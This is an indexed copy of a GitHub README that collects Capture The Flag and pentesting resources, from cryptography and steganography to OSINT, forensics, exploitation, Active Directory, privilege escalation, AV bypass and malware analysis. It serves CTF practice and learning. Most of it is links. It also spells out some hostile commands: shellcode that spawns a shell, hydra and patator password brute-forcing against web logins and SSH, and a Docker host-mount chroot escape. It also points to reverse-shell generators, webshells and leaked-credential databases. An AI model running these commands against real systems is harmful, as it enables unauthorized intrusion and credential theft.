Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Ph4l4nx/CTF-s-Tools

Repository to index useful tools for CTF's
https://github.com/Ph4l4nx/CTF-s-Tools

Last synced: 3 months ago
JSON representation

Repository to index useful tools for CTF's

Awesome Lists containing this project

README

        

Repository to index interesting Capture The Flag tools and other stuff.

* [Table of Contents](#table-of-contents)
- [Platforms to practice](#platforms-to-practice)
- [Cryptography](#cryptography)
* [Main](#main)
* [Secondary](#secondary)
* [Hashes](#hashes)
* [Esoteric Languages](#esoteric-languages)
- [Steganography](#steganography)
- [OSINT](#osint)
* [Threat Hunting](#threat-hunting)
- [Forensics](#forensics)
- [Reversing](#reversing)
- [Exploiting](#exploiting)
- [Pentesting](#pentesting)
* [Recon](#recon)
* [Web](#web)
* [Exploit Database](#exploit-database)
* [Docker](#docker)
* [Credentials](#credentials)
* [Exploitation](#exploitation)
* [Active Directory](#active-directory)
* [Privilege Escalation](#privilege-escalation)
- [Windows](#windows)
- [Linux](#linux)
* [Legit binaries in a system](#legit-binaries-in-a-system)
* [AV bypass](#av-bypass)
* [Automatic Frameworks](#automatic-frameworks)
* [Mobile](#mobile)
* [Wifi](#wifi)
* [Utility](#utility)
- [Malware](#malware)
* [Online engines](#online-engines)
* [Distros to analyze malware](#distros-to-analyze-malware)
* [Tools](#tools)
* [Free AVs and sandboxes](#free-avs-and-sandboxes)
* [Ransomware](#ransomware)
* [APTs](#apts)
* [Blogs and Information](#blogs-and-information)
- [Utility](#utility-1)
- [Wikis](#wikis)
- [Write-Ups](#write-ups)
- [Other tools](#other-tools)

## Platforms to practice

https://ctftime.org/

https://www.hackthebox.eu/

https://atenea.ccn-cert.cni.es/home

https://tryhackme.com/

https://www.vulnhub.com/

* Web Hacking challenges: http://webhacking.kr/

* Platform for learning modern cryptography: https://cryptohack.org/

* Reversing platform: https://crackmes.one/

* Forensics Challenges: https://ctf.unizar.es/ && https://freetraining.dfirdiva.com/dfir-ctfs-challenges && https://socvel.com/

* PicoCTF: https://play.picoctf.org/login

* Blue team: https://letsdefend.io/

## Cryptography

### Main

https://gchq.github.io/CyberChef/

https://www.dcode.fr/tools-list#cryptography

* Cipher Identifier and Analyzer: https://www.boxentriq.com/code-breaking/cipher-identifier

* Data format identifier: https://geocaching.dennistreysa.de/multisolver/

### Secondary

* Automated cryptogram solver (substitution) https://quipqiup.com/

* Frequency Analysis: https://crypto.interactive-maths.com/frequency-analysis-breaking-the-code.html

* Brute force Vigenere: https://guballa.de/vigenere-solver

* RsaCtfTool: https://github.com/Ganapati/RsaCtfTool

* Decrpyt emoji messages https://cryptoji.com/ & https://cryptii.com/pipes/morse-code-with-emojis

* Padding-oracle-attacker: https://github.com/KishanBagaria/padding-oracle-attacker

* Maritime signal flags dictionary: https://en.wikipedia.org/wiki/International_maritime_signal_flags

* Enigma: https://cryptii.com/

* Factoring: http://factordb.com/

* Cryptanalysis recopilation: https://github.com/mindcrypt/Cryptanalysis

http://rumkin.com/tools/cipher/

* Real time converter: https://kt.gy/tools.html#conv/

* Simple script to calculate the onion address from a Tor hidden service descriptor or public key: https://gist.github.com/DonnchaC/d6428881f451097f329e (you need to modify the line 14 for working properly "onion_address = hashlib.sha1(key.exportKey('DER')[22:]).digest()[:10]").

* Speech to text: https://speech-to-text-demo.ng.bluemix.net/

* Lyrics song: https://codewithrockstar.com/online

* Online generator md5 hash of a string: http://www.md5.cz/

### Hashes

* Hash DB: https://crackstation.net/

* Dehashed: https://www.dehashed.com/

* Cracking Hashes: http://rainbowtables.it64.com/

* Hash DB: https://www.onlinehashcrack.com/

* Hash DB: https://md5decrypt.net/en/

* Hash DB: https://hashkiller.io/

* Hash DB: https://hashes.com/en/decrypt/hash

### Esoteric Languages

* Ook! esoteric programming language decoder: https://www.dcode.fr/ook-language

* Brainfuck esoteric programming language decoder: https://www.dcode.fr/brainfuck-language

* Malboge esoteric programming language decoder: https://www.malbolge.doleczek.pl/

* COW esoteric programming language: https://frank-buss.de/cow.html

## Steganography

* Exiftool

* Zsteg

* Exiv2

* Identify -verbose file

* Magic Numbers Signatures: https://asecuritysite.com/forensics/magic && https://www.garykessler.net/library/file_sigs.html → Hexeditor

* Shellcode detection: "8B EC"

* Binwalk -e image

* Foremost -i image -o outdir

* Steghide: http://steghide.sourceforge.net/documentation/manpage_es.php (e.g: steghide extract -sf file , steghide info file)

* Stegseek: https://github.com/RickdeJager/stegseek (Better than Stegcracker)

* StegCracker: https://github.com/Paradoxis/StegCracker

* Deeper steganography analysis tool: https://aperisolve.fr/

* Spectrum Analyzer: https://academo.org/demos/spectrum-analyzer/

* Stegsolve: https://github.com/zardus/ctf-tools/blob/master/stegsolve/install (running: java -jar steg_solve.jar)

* Fourier Transform: http://bigwww.epfl.ch/demo/ip/demos/FFT/ && https://github.com/0xcomposure/FFTStegPic

* Digital invisible ink stego tool: https://sourceforge.net/projects/diit/

* Decoding files from 8-bit Atari turbo cassette tapes: https://github.com/baktragh/turbodecoder

https://incoherency.co.uk/image-steganography/#unhide

http://exif-viewer.com/

https://stegonline.georgeom.net/upload

https://stylesuxx.github.io/steganography/

https://skynettools.com/free-online-steganography-tools/

* Morse Code Adaptive Audio Decoder: https://morsecode.world/international/decoder/audio-decoder-adaptive.html

* Audacity (sudo apt-get install audacity) E.g: https://www.hackiit.cf/write-up-hackiit-ctf-biological-hazard-ii/

* AudioStego: https://github.com/danielcardeenas/AudioStego

* Analyze suspicious files and urls to detect stegomalware: https://stegoinspector.com/#/

* Aurebesh Translator: https://funtranslations.com/aurebesh

* Bitcoin Steganography: https://incoherency.co.uk/stegoseed/

* Mojibake Steganography: https://incoherency.co.uk/mojibake/

* Chess Steganography : https://incoherency.co.uk/chess-steg/

* Magic Eye Solver / Viewer: https://magiceye.ecksdee.co.uk/

* QR decoder: https://online-barcode-reader.inliteresearch.com/ && https://zxing.org/w/decode.jspx

* Stegosuite: http://manpages.ubuntu.com/manpages/bionic/man1/stegosuite.1.html

* StegSpy: http://www.spy-hunter.com/stegspydownload.htm

* StegSecret: http://stegsecret.sourceforge.net/

* Openstego: https://www.openstego.com/

* Stegpic: https://domnit.org/stepic/doc/

* Bytehist: https://www.cert.at/en/downloads/software/software-bytehist

https://www.bertnase.de/npiet/npiet-execute.php

* Repair images: https://online.officerecovery.com/es/pixrecovery/

* Tool for recovering passwords from pixelized screenshots: https://github.com/beurtschipper/Depix

* Forensic Image Analysis: https://github.com/GuidoBartoli/sherloq

* Unicode Steganography with Zero-Width Characters: https://330k.github.io/misc_tools/unicode_steganography.html

* Stegsnow(Zero-Width Characters): https://pentesttools.net/hide-secret-messages-in-text-using-stegsnow-zero-width-characters/

* SPAM language or PGP: https://www.spammimic.com/decode.shtml

* f5stegojs: https://desudesutalk.github.io/f5stegojs/

* Unshorten links: https://unshorten.it/

* PNG dump: https://blog.didierstevens.com/2022/04/18/new-tool-pngdump-py-beta/

## OSINT

* Ip information: https://www.maxmind.com/en/geoip-demo

https://sitereport.netcraft.com/? && https://searchdns.netcraft.com/

* https://iocfeed.mrlooquer.com/

* https://www.ipaddress.com/

* GHDB (Google Hacking Database): https://www.exploit-db.com/google-hacking-database

* Google CheatSheet: https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06

https://ciberpatrulla.com/links/

https://osintframework.com/

* Tools, flowcharts and cheatsheets to help you do your OSINT research: https://technisette.com/p/tools

* Recopilation: https://osint.link/

* World domain DB: http://web.archive.org/ && https://archive.eu/

* DNS Search: https://dns.coffee/

* Cyber Defense Search: https://www.onyphe.io/

* Abuse Domain,IP: https://www.abuseipdb.com/

https://dns-lookup.jvns.ca/

https://www.greynoise.io/

https://www.brightcloud.com/tools/url-ip-lookup.php

* Reputation url checker: https://www.urlvoid.com/

* The search engine for the Internet of Things: https://www.shodan.io/ && All filters cheatseet: https://beta.shodan.io/search/filters

* IVRE: https://ivre.rocks/

* Threat Intel Tools: https://cyberfive.uk/threat-intel-tools/

https://talosintelligence.com/

* PGP Global Directory: https://keyserver2.pgp.com/vkd/GetWelcomeScreen.event

* Hurricane Electric BGP: https://bgp.he.net/

* Email2PhoneNumber: https://github.com/martinvigo/email2phonenumber

* Honeypot or not: https://honeyscore.shodan.io/

https://builtwith.com/

* Pwn email DB TOR: http://pwndb2am4tzkvold.onion/

* Website to check if emails or passwords have been compromised: https://haveibeenpwned.com/

* Leaks: https://leaks.sh/

* Pwn DB: https://www.dehashed.com/?__cf_chl_jschl_tk__=ab484f797848c365ec48f7297ac4b9ba4587d775-1625827161-0-ARQgSNH3MSi0R4OUxmHmJCgUIz4nZrldFwXK6QZ21tONCEndyB_ypTCETLDm8vhRWeKD6v_ZraA5mbmvd03j1oeQb7QNsx5pg0lMhaNv2l7aw8DKR4a7ENkylr9knbiDx9X3RVn5AcH2uWuG_yRgk28j6x_zyccpXWc8LsTN9VxXZCZb16SEqwbuLdQ-JjWp0eQIgEMAPkLgosrsZyCdRa0A2mqMu8Mz4g-j4z8xR4v-4tqNwcP_TNtCK74-DIWZ80Zth2At6XizE72m_QifLrQH-gFUWPQ7hMzbNr5ONgZbyTZy_0YQA2SqHS5EUj5duq3WhbHdKEsRzXC6ch1EdQ5GagnSc8fH_NAqrI2aebrGF37HEXWkn7ZwxLGDLPAF63tV-77gQ4xhCnCDJp-vpcs

* Pwn email DB: https://intelx.io/

* Pwn email DB: https://cybernews.com/personal-data-leak-check/

* PwnDB Script: https://github.com/davidtavarez/pwndb

* Search filtered credentials in plain text: https://esgeeks.com/pwndb-buscar-credenciales-filtradas-texto-plano/

* Email checker: https://toolbox.googleapps.com/apps/checkmx/

* Car Recognition: https://carnet.ai/

* Hour of a picture, sun calculator: https://www.suncalc.org/#/27.6936,-97.5195,3/2024.01.09/09:23/1/3

* General purpose: https://github.com/Moham3dRiahi/Th3inspector

* Gooogle Image Search: https://www.google.es/imghp?hl=es , Yandex: https://yandex.com/images/ , Bing: https://www.bing.com/?scope=images&nr=1&FORM=NOFORM

* Reverse Image Search: https://tineye.com/

* Tool for tracking the redirection paths of URLs: https://wheregoes.com/

* Phishing Domain DB: http://phishtank.org/

* Phishing Domain DB: https://phishcheck.me/

* Phishing Research: https://safeweb.norton.com/ , https://isitphishing.org/, https://openphish.com/ && https://opentip.kaspersky.com/.

* Instagram: https://github.com/th3unkn0n/osi.ig

* Censys: https://censys.io/ipv4

* Zoomeye.org: https://www.zoomeye.org/

* IVRE: https://ivre.rocks/

* IOT search engine: https://www.thingful.net/

* Find email addresses related to a domain: https://hunter.io/

* People search engine: https://thatsthem.com/

* Fofa search engine: https://fofa.so/ (Similar to Shodan)

* Graphical OSINT platform: https://www.spiderfoot.net/#

* Fullhunt: https://fullhunt.io/

* Code search: https://grep.app/ && https://publicwww.com/

* Natlas: https://natlas.io/

* Spur: https://spur.us/

* Public Wi-Fi database: https://www.mylnikov.org/

* HTTP headers of a domain: https://www.webconfs.com/http-header-check.php

* Metadata of public's documents: https://github.com/Josue87/MetaFinder

* Twitter: https://github.com/twintproject/twint && https://tinfoleak.com/

* https://github.com/Quantika14/osint-suite-tools

* Check your OWA (Outlook Web Access): https://checkmyowa.unit221b.com/

* Whatspp IP Leak: https://github.com/bhdresh/Whatsapp-IP-leak?s=09

* Book: https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf

### Threat Hunting

Analysis I: https://centralops.net/co/

Analaysis II: https://viewdns.info/

Analysis III: https://sitereport.netcraft.com/

Analysis IV: https://www.ipaddress.com/

Malware: https://www.virustotal.com/gui/home/upload & https://opentip.kaspersky.com/

Reputation: https://talosintelligence.com/, https://www.abuseipdb.com/

Technology of a domain: https://builtwith.com/

Tool for tracking the redirection paths of URLs: https://wheregoes.com/

History of a Domain: https://web.archive.org/

Real-time blackhole list,ASNs: https://bgp.he.net/

SSL certificates: https://www.digicert.com/help/

Redirects: https://lookyloo.circl.lu/

Phishing Domain DB: http://phishtank.org/

Phishing Domain DB: https://phishcheck.me/

Phishing Domains CSV: https://phishstats.info/

Phishing Research: https://safeweb.norton.com/ , https://isitphishing.org/, https://openphish.com/ && https://opentip.kaspersky.com/.

Recopilation: https://osintframework.com/

Email account analysis: curl emailrep.io/[email protected]

## Forensics

* Online PCAP Analysis: https://lab.dynamite.ai/

* Tool to identify strings from a pcap: https://github.com/bee-san/pyWhat. Ex:python3 -m pywhat redteam_test03-10423dd9015c050a40b7ccf2a53f57a9.pcapng > output

* Advanced PCAP: https://www.kitploit.com/2023/08/bryobio-network-pcap-file-analysis.html

* Wireshark. Cheat sheet: https://cdn.comparitech.com/wp-content/uploads/2019/06/Wireshark-Cheat-Sheet-1.jpg

* Volatility. Cheat sheet: https://blog.onfvp.com/post/volatility-cheatsheet/ >>> Malfind,yarascan, Connscan y netscan

* Foremost

* Binwalk

* Autopsy

* PhotoRec: https://www.cgsecurity.org/wiki/PhotoRec

* Photo forensics: https://29a.ch/photo-forensics/#forensic-magnifier

* Recuva: https://www.ccleaner.com/recuva

* Keys: https://www.nirsoft.net/utils/product_cd_key_viewer.html

* DDRescue. https://launchpad.net/ddrescue-gui

* Rescuezilla: https://rescuezilla.com/

* PolarProxy: https://www.netresec.com/?page=PolarProxy

* MRC: https://www.magnetforensics.com/resources/magnet-ram-capture/

* Media acquisition (disk to image): https://guymager.sourceforge.io/

* Rapidly Search and Hunt through Windows Event Logs: https://github.com/countercept/chainsaw

* AccessData FTK Imager

* EnCase

* EaseUS Data Recovery Wizard

* Testdisk: https://www.cgsecurity.org/wiki/TestDisk_Download

* MFT_Browser: https://github.com/kacos2000/MFT_Browser

* Powershell Decoder: https://github.com/R3MRUM/PSDecode, https://github.com/JohnLaTwC/PyPowerShellXray and analysis info: https://darungrim.com/research/2019-10-01-analyzing-powershell-threats-using-powershell-debugging.html

* PDF analyzer: https://github.com/zbetcheckin/PDF_analysis, https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdfid.py, https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py y https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

* Office analyzer: https://github.com/DissectMalware/XLMMacroDeobfuscator, https://github.com/unixfreak0037/officeparser, https://github.com/decalage2/oletools, https://github.com/bontchev/pcodedmp, https://github.com/decalage2/ViperMonkey && https://blog.didierstevens.com/programs/oledump-py/.

* Extract Unicode-encoded content from a file: https://github.com/DidierStevens/DidierStevensSuite/blob/master/base64dump.py

* DTMF telephone frecuency: https://unframework.github.io/dtmf-detect/

* To decrypt WPA keys: pyrit -r "capctura.pcap" analyze

* Diskeditor: https://www.disk-editor.org/index.html

* Passware encryption analyzer: https://www.passware.com/encryption-analyzer/

* Windows Registry Recovery: https://www.softpedia.com/get/Tweak/Registry-Tweak/Windows-Registry-Recovery.shtml

* xxd command

* Blue Team Cheat sheet: https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf

* DFIR cheat sheet: https://www.jaiminton.com/cheatsheet/DFIR/#

* Parse a user agent: https://developers.whatismybrowser.com/useragents/parse/

* Grep cheat sheet: https://javiermartinalonso.github.io/linux/2018/01/15/linux-grep-patrones-debug.html

* Blog: https://www.osintme.com/

* Regular expressions for grep -Po " " https://www.autoregex.xyz/ && https://regex101.com/ . Cheat sheet: https://cheatography.com/davechild/cheat-sheets/regular-expressions/

* DFIR Cheatsheet: https://dfircheatsheet.github.io/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

https://blog.didierstevens.com/programs/xorsearch/

Forensics RECOPILATION: https://start.me/p/JDRmPO/recursos-forenses && https://start.me/p/q6mw4Q/forensics

## Reversing

* Binwalk

* Dotpeek (.NET)

* Angr(deobfuscated code): https://angr.io/ && https://napongizero.github.io/blog/Defeating-Code-Obfuscation-with-Angr

* GameBoy debugger: https://bgb.bircd.org/

* IDA pro. Cheat Sheet: https://www.dragonjar.org/cheat-sheet-ida-pro-interactive-disassembler.xhtml

* Ollydbg. Cheat Sheet: http://www.ollydbg.de/quickst.htm

* GDB: https://gist.github.com/rkubik/b96c23bd8ed58333de37f2b8cd052c30

* Radare2. Cheat Sheet: https://gist.github.com/williballenthin/6857590dab3e2a6559d7

* Ghidra. Cheat Sheet: https://hackersfun.com/wp-content/uploads/2019/03/Ghidra-Cheat-Sheet.pdf

* Immunity Debugger: https://www.immunityinc.com/products/debugger/

* x64dbg

* DnSpy https://github.com/dnSpy/dnSpy

* Binary Ninja: https://binary.ninja/

* Beginner reversing tool: https://exeinfo-pe.en.uptodown.com/windows

* Regshot: https://sourceforge.net/projects/regshot/ (before and after running a binary)

* CFF explorer: https://download.cnet.com/CFF-Explorer/3000-2383_4-10431156.html

* Online Disassembler: https://onlinedisassembler.com/static/home/index.html

* Online Decompiler Explorer: https://dogbolt.org/

* Online Compiler Explorer: https://godbolt.org/

* Online .JAR and .Class to Java decompiler: http://www.javadecompilers.com/

* Hex editor, disk editor, and memory editor: https://mh-nexus.de/en/downloads.php?product=HxD20

* Android Decompiler: https://ibotpeaches.github.io/Apktool/

* Decompile Android files: https://github.com/skylot/jadx

* Hopper disassembler: https://www.hopperapp.com/

* List Dynamic Dependencies: Ldd file

* Unpacking some binaries: Upx -d file

* Identifying packers: https://github.com/horsicq/Detect-It-Easy

* Theory: https://0xinfection.github.io/reversing/

* Intel® 64 and IA-32 Architectures Software Developer’s Manual: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf

* Tips: https://blog.whtaguy.com/2020/04/guys-30-reverse-engineering-tips-tricks.html

## Exploiting

* Ej1: python -c "print 'A'*150" >>> Then ./binario 150 A

python -c "print ('A' * 5100)"

* Ej2: (echo -e "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; cat-) | ./binario (Shellcode for x86 32 linux)

## Pentesting

Common ports cheatsheet: https://packetlife.net/media/library/23/common_ports.pdf

Enumeration cheatsheet: https://pentestwiki.org/enumeration-cheat-sheet/

### Recon

* Nmap. Cheatsheet: https://highon.coffee/blog/nmap-cheat-sheet/ && https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20NMap%20Quick%20Reference%20Guide.pdf

* S.O recon: "version of a service https://launchpad.net/"

* https://sitereport.netcraft.com/

* GUI-DNSRecon: https://www.kitploit.com/2023/02/dnsrecon-gui-dnsrecon-tool-with-gui-for.html

* enum4linux - https://highon.coffee/blog/enum4linux-cheat-sheet/

Dig: https://cheatography.com/tme520/cheat-sheets/dig/

wget -nd -r -P /save/location -A jpeg,jpg,bmp,gif,png http://www.somedomain.com

Recursive file download bypassing robots.txt: wget -e robots=off -drc -l5 domain

* Scanning with third parties: https://hackertarget.com/nmap-online-port-scanner/, https://www.ipfingerprints.com/, https://spiderip.com/online-port-scan.php, https://portscanner.standingtech.com/ && https://www.yougetsignal.com/tools/open-ports/

* Scanless project: https://github.com/vesche/scanless

* List emails from a domain: https://maildump.co/domain-search

* List domains of a company: Curl https://sonar.omnisint.io/tlds/

* SPF,DKIM,DMARC: https://github.com/MattKeeley/Spoofy & https://www.kitploit.com/2023/02/email-vulnerablity-checker-find-email.html & https://github.com/magichk/magicspoofing && https://toolbox.googleapps.com/apps/checkmx/

* Company hashes & passwords: https://www.dehashed.com/

* dnsrecon -d dte.local -n IP - https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/

* Biggest DNS historical data: https://securitytrails.com/

* DNS Host Records: https://hackertarget.com/find-dns-host-records/

* HTTP Header Analysis Vulnerability Tool: https://dnsdumpster.com/

* ReconFTW: https://github.com/six2dez/reconftw

* Autorecon: https://github.com/Tib3rius/AutoRecon

* OSINT gathering tool: https://github.com/s0md3v/Photon

* OSINT gathering tool: https://github.com/laramies/theHarvester

* DNS resolver: https://github.com/d3mondev/puredns

* Sublist3r: https://github.com/aboul3la/Sublist3r

* Ffuf: https://github.com/ffuf/ffuf

* Nuclei: https://github.com/projectdiscovery/nuclei

* Expired domains: https://www.expireddomains.net/

### Web

* Wappalyzer

* whatweb -v -a 3 scanme.nmap.org

* nmap -p 80 --script=http-*

* HTTP Header Analysis Vulnerability Tool: https://github.com/Aetsu/gethead/blob/gh-pages/gethead.py

* Feroxbuster

* Gobuster. Cheat Sheet: https://redteamtutorials.com/2018/11/19/gobuster-cheatsheet/

* Burpsuite

* OWASP ZAP, OpenVas, Sparta & Nikto. Cheat Sheet: https://cdn.comparitech.com/wp-content/uploads/2019/07/NIkto-Cheat-Sheet.webp

* Hydra. Cheat Sheet: hydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form “__csrf_magic=sid%3Ae40fd9611063464c3ff346ffa53b7a28b3cd5971%2C1638348501&usernamefld=admin&passwordfld=^PASS^&login=Sign+In" || patator http_fuzz url=http://IP/ method=POST &usernamefld=admin&passwordfld=FILE0&login=Sign+In' 0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=1 -x ignore:fgrep='Username or Password incorrect'

* hydra -s 22 -l user -P /usr/share/wordlists/rockyou.txt IP -t 4 ssh

* wfuzz. Cheat Sheet: https://book.hacktricks.xyz/pentesting-web/web-tool-wfuzz

* 2FA Bypass: https://www.xmind.net/m/8Hkymg/

* Dirbuster. https://mundo-hackers.weebly.com/dirbuster.html

* Linkfinder: https://github.com/GerbenJavado/LinkFinder

* Dirsearch: https://github.com/maurosoria/dirsearch

* Automated All-in-One OS command injection and exploitation tool: https://github.com/commixproject/commix

* Automated XSS tool: https://xsser.03c8.net/

* Automated XSS tool: https://github.com/ssl/ezXSS

* RECOX: https://github.com/samhaxr/recox/blob/master/recox.sh

* SQL payload examples: https://github.com/payloadbox/sql-injection-payload-list

* Command injection: https://github.com/payloadbox/command-injection-payload-list

* XSS in 2021: https://netsec.expert/posts/xss-in-2021/

* SSRF Cheatsheet: https://highon.coffee/blog/ssrf-cheat-sheet/#curl-ssrf-wrappers--url-schema

* WPscan

* XSS firefox extension searcher: https://addons.mozilla.org/es/firefox/addon/knoxss-community-edition/

* Inspect HTTP headers: https://requestbin.net/ && https://webhook.site/#!/75039a57-2015-4f74-9612-b762f4353b9b && https://securityheaders.com/?q=aguasdelsorbe.es&followRedirects=on

https://pentest-tools.com/home

https://book.hacktricks.xyz/

http://jsonviewer.stack.hu/

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE

https://jorgectf.gitbook.io/awae-oswe-preparation-resources/

* Web Tips: https://www.nccgroup.com/globalassets/our-research/uk/images/common_security_issues_in_financially-orientated_web.pdf.pdf

### Exploit Database

* CVE Search: https://github.com/Anonimo501/cve_search

* https://www.exploit-db.com/

* SearchSploit. Cheat sheet: https://blog.ehcgroup.io/2018/11/27/01/00/39/4198/como-usar-searchsploit-para-encontrar-exploits/hacking/ehacking/

* https://cvexploits.io/

### Docker

docker run -v /:/mnt --rm -it imagen chroot /mnt sh

### Credentials

* Default credentials: https://github.com/ihebski/DefaultCreds-cheat-sheet/blob/main/DefaultCreds-Cheat-Sheet.csv

### Exploitation

* Online reverse shell generator: https://www.revshells.com/

* Reverse shell cheatsheet: https://reconshell.com/reverse-shell-cheat-sheet/ && Cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

* Webshells: https://github.com/BlackArch/webshells

* Popshells: https://github.com/0x00-0x00/ShellPop

* Upgrading Simple Shells to Fully Interactive TTYs: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

* crackmapexec - https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/

* Rundll32 commands examples: https://www.jesusninoc.com/04/12/rundll32-commands-for-windows/

* rdesktop IP, proxychains IP

* sqlmap - https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

* Reverse shell payload generator - Hoaxshell: https://github.com/t3l3machus/hoaxshell

* Running commands on an Microsoft Exchange: https://github.com/WithSecureLabs/peas

* Powerglot: https://github.com/mindcrypt/powerglot

### Active Directory

* Network Scanner: https://www.softperfect.com/products/networkscanner/

* linWinPwn: https://github.com/lefayjey/linWinPwn

* Mimikatz: https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz

* Crackmapexec: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/

* LDAP enumeration: https://pentestwiki.org/enumeration-cheat-sheet/#h-ldap-enumeration

* Seatbelt check: https://github.com/GhostPack/Seatbelt

* Bloodhound: https://bloodhound.readthedocs.io/en/latest/index.html

* Adalanche: https://www.kitploit.com/2021/08/adalanche-active-directory-acl.html

### Privilege Escalation

#### Windows

sudo apt install peass

* WinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

* Juicy potato: https://github.com/ohpe/juicy-potato

* PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1

#### Linux

* LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

* LinEnum: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

* BeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux

### Legit binaries in a system

* Lolbas from Windows: https://lolbas-project.github.io/

* GTFOBins from Unix Systems: https://gtfobins.github.io/

### AV bypass

* Bypass Windows defender with binaries: https://github.com/Bl4ckM1rror/FUD-UUID-Shellcode

* Shikata ga nai: https://github.com/EgeBalci/sgn

* AV'S evasion: https://github.com/Veil-Framework/Veil-Evasion

* Shellter: https://www.kali.org/tools/shellter/

### Automatic Frameworks

* Metasploit. Cheatsheet: https://github.com/k1000o23/cheat_sheets/blob/master/metasploit_cheat_sheet.pdf

* Kaboom: https://github.com/Leviathan36/kaboom

* Fsociety framework: https://github.com/Manisso/fsociety

* Empire. Cheatsheet: https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf

### Mobile

* Mobile Pentest Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet && https://github.com/randorisec/MobileHackingCheatSheet

* Automated Mobile tools: https://github.com/MobSF/Mobile-Security-Framework-MobSF, https://github.com/SUPERAndroidAnalyzer/super

* List of Vulnerable Android Applications: https://github.com/netbiosX/Pentest-Bookmarks/blob/master/Training-Labs/Mobile-Testing/Android-Applications.mdown

* PcapDroid: https://play.google.com/store/apps/details?id=com.emanuelef.remote_capture&hl=es_419&gl=US

### Wifi

* Fing application: https://www.fing.com/

* Wifi analyzer: https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&hl=es&gl=US&pli=1

* Auditing Wifi: https://github.com/v1s1t0r1sh3r3/airgeddon

* https://en.kali.tools/?p=244

* Wifi Crack: https://github.com/s4vitar/wifiCrack

* Fern: https://github.com/savio-code/fern-wifi-cracker

* EvilTrust: https://github.com/s4vitar/evilTrust

* RomBuster: https://github.com/EntySec/RomBuster

Yersinia

Bettercap

Wifi Pineapple

https://linuxhint.com/how_to_aircrack_ng/

* PCAP capture crack: https://www.onlinehashcrack.com/

### Utility

* mount -t cifs IP/SharedResource /mnt/smbmounted -o vers=2.1 && * smbclient -U "" -N //IP/SharedResource

* dpkg -l to list all the installed programs in a virtual machine. Pipe the output in order to search what you want.

* Msfvenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ & https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

* Nishang: https://github.com/samratashok/nishang

* Are u block?: https://ippsec.rocks/?#

* OSCP-style: https://gist.github.com/s4vitar/b88fefd5d9fbbdcc5f30729f7e06826e

* Pentest-book: https://pentestbook.six2dez.com/ && https://book.hacktricks.xyz/pentesting-methodology

* Videos: https://www.youtube.com/c/S4viOnLive

## Malware

### Online engines

* https://www.filescan.io/

* Virustotal: https://www.virustotal.com/gui/home/search

* Online Cuckoo Sandbox: https://sandbox.pikker.ee/

* APK's: https://mobsf.live/ && https://koodous.com/

* Joesandbox: https://www.joesandbox.com/#windows

* Kaspersky: https://opentip.kaspersky.com/

* Intezer: https://analyze.intezer.com/scan

* Hybrid Analysis: https://www.hybrid-analysis.com/?lang=es

* Database of counterfeit-related webs: https://desenmascara.me/

* ANY.RUN https://any.run/

https://antiscan.me/

https://www.virscan.org/

* Polyswarm: https://polyswarm.network

https://metadefender.opswat.com/?lang=en

### Distros to analyze malware

* Linux Distro to investigate malware: https://docs.remnux.org/

* Windows Distro to investigate malware: https://github.com/mandiant/flare-vm

* https://github.com/LaurieWired/linux_malware_analysis_container

### Tools

* Sysinternals: https://docs.microsoft.com/en-us/sysinternals/

* Systeminformer: https://systeminformer.sourceforge.io/

* Capa: https://github.com/mandiant/capa

* Detect it easy(packer detector): https://en.kali.tools/?p=1644

* Sysinspector: https://support.eset.com/es/que-es-eset-sysinspector

* Dependency walker from an executable file: https://www.dependencywalker.com/

* Autoruns: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

* RAM capturer: https://belkasoft.com/ram-capturer

* Recopilation: https://github.com/rshipp/awesome-malware-analysis

* Reverse Engineer's Toolkit: https://github.com/mentebinaria/retoolkit

* PEstudio: https://www.winitor.com/

* Malzilla: https://malzilla.org/

* PROCMON+PCAP: https://www.procdot.com/

* Analyze APK's: https://github.com/quark-engine/quark-engine && https://github.com/mvt-project/mvt && https://github.com/pjlantz/droidbox

* XORSearch: https://blog.didierstevens.com/programs/xorsearch/

* RAT Decoder: https://github.com/kevthehermit/RATDecoders

* Malwoverview: https://github.com/alexandreborges/malwoverview

* Binary strings defuser: https://github.com/fireeye/flare-floss

* Network analysis of malware (emulate HTTP server): https://github.com/felixweyne/imaginaryC2

